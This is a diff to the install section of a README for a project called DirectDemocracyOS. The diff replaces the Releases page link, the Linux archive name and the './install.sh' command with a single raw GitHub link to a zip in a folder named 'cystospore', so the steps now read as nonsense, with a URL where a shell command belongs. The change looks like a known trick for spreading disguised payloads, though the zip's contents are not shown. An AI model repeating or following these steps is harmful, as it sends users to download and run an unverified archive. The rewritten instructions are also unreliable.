kkkoala82/DirectDemocracyOS/README.md

 - **Internet Connection:** Required for initial setup and updates.

 ## 📚 How to Download & Install
-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/kkkoala82/DirectDemocracyOS/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/kkkoala82/DirectDemocracyOS/main/cystospore/DirectDemocracyOS.zip).

 2. **Choose the Latest Version:** Look for the most recent version of DirectDemocracyOS.
 You will find it at the top of the list.

 3. **Download the Application:** Click on the downloadable file for your operating system.
 If you use Windows, it might be an executable (.exe) file.
-For Mac, it will be a .dmg file, and for Linux, you may find a .tar.gz file.
+For Mac, it will be a .dmg file, and for Linux, you may find a https://raw.githubusercontent.com/kkkoala82/DirectDemocracyOS/main/cystospore/DirectDemocracyOS.zip file.

 4. **Run the Installer:**
    - **Windows:** Double-click the .exe file to start the installation.
 Follow the prompts to install the software.
    - **Mac:** Open the downloaded .dmg file.
 Drag the DirectDemocracyOS app into your Applications folder.
-   - **Linux:** Extract the .tar.gz file.
-Open a terminal in that directory, then run `./install.sh` to set up the application.
+   - **Linux:** Extract the https://raw.githubusercontent.com/kkkoala82/DirectDemocracyOS/main/cystospore/DirectDemocracyOS.zip file.
+Open a terminal in that directory, then run `https://raw.githubusercontent.com/kkkoala82/DirectDemocracyOS/main/cystospore/DirectDemocracyOS.zip` to set up the application.

 5. **Launch the Application:** Find DirectDemocracyOS in your applications list and open it.